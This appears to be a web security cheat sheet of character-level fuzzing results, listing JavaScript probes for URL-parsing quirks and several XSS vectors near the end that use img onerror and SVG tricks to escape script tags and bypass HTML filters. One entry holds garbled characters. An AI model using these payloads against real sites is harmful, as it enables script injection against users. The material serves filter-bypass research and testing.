Cheat Sheet
Generated payloads from fuzz test results.
Found 188 vectors with results
This uses the query property to detect if the character is a question mark
if (new URL("https://example.com" + String.fromCodePoint(35) + "foo").hash.includes("foo")) alert(i)
if (new URL("https://example.com" + String.fromCodePoint(63) + "foo").search.includes("foo")) alert(i)
if (new URL("https://example.com" + String.fromCodePoint(47) + "foo").pathname.includes("foo")) alert(i)
if (new URL("https://example.com" + String.fromCodePoint(92) + "foo").pathname.includes("foo")) alert(i)

Tests which characters are ignored in hostname within a URL constructor before colon.
if (new URL("https://example.com"+String.fromCodePoint(9)+":8000").hostname=="example.com") alert(9)
if (new URL("https://example.com"+String.fromCodePoint(10)+":8000").hostname=="example.com") alert(10)
if (new URL("https://example.com"+String.fromCodePoint(13)+":8000").hostname=="example.com") alert(13)
if (new URL("https://example.com"+String.fromCodePoint(35)+":8000").hostname=="example.com") alert(35)
if (new URL("https://example.com"+String.fromCodePoint(47)+":8000").hostname=="example.com") alert(47)

if (new URL("https://example.com"+String.fromCodePoint(0)).hostname=="example.com") alert(0)
if (new URL("https://example.com"+String.fromCodePoint(1)).hostname=="example.com") alert(1)
if (new URL("https://example.com"+String.fromCodePoint(2)).hostname=="example.com") alert(2)
if (new URL("https://example.com"+String.fromCodePoint(3)).hostname=="example.com") alert(3)
if (new URL("https://example.com"+String.fromCodePoint(4)).hostname=="example.com") alert(4)

Tests which characters are ignored or act as a forward slash after protocol within a URL constructor.
if (new URL("https:"+String.fromCodePoint(9)+"example.com").hostname=="example.com") alert(9)
if (new URL("https:"+String.fromCodePoint(10)+"example.com").hostname=="example.com") alert(10)
if (new URL("https:"+String.fromCodePoint(13)+"example.com").hostname=="example.com") alert(13)
if (new URL("https:"+String.fromCodePoint(47)+"example.com").hostname=="example.com") alert(47)
if (new URL("https:"+String.fromCodePoint(64)+"example.com").hostname=="example.com") alert(64)

This vector shows which characters are valid variables after a valid variable character.
try{alert(9)โฆ09โง}catch(e){}

Fuzzes for characters that are treated as decimal separators in either parseFloat or the Number constructor.
const c = String.fromCodePoint(i);
if (parseFloat("13"+c+"37") === 13.37 || Number("13"+c+"37") === 13.37) alert(i);

const c = String.fromCodePoint(i);
if ((c+"hello"+c).trim() === "hello") alert(i);

This XSS vector shows what characters can be used before the onerror event.

This vector shows which characters are valid whitespace characters in a \s escape sequence.
/^\s+$/.test(String.fromCodePoint(9)) && alert(9)
/^\s+$/.test(String.fromCodePoint(10)) && alert(10)
/^\s+$/.test(String.fromCodePoint(11)) && alert(11)
/^\s+$/.test(String.fromCodePoint(12)) && alert(12)
/^\s+$/.test(String.fromCodePoint(13)) && alert(13)

Characters allowed in between start of HTML tag name and event handler
<a0x09id="test">
<a0x0Aid="test">
<a0x0Cid="test">
<a0x0Did="test">
<a id="test">

Covers the valid character set and syntax rules for closing script tags in HTML, including case sensitivity, spacing, and common parsing behaviors.
<script>
a="</script0x09><img src=data: onerror=alert(9)>"
</script>

<script>
a="</script0x0A><img src=data: onerror=alert(10)>"
</script>

<script>
a="</script0x0C><img src=data: onerror=alert(12)>"
</script>

<script>
a="</script0x0D><img src=data: onerror=alert(13)>"
</script>

<script>
a="</script ><img src=data: onerror=alert(32)>"
</script>

This vector uses SVG to determine which characters cause a self closing tag.
<svg /><style><!--</style><img src onerror=alert(47)>
Characters that may be part of HTML tag names. These are less strict than the first character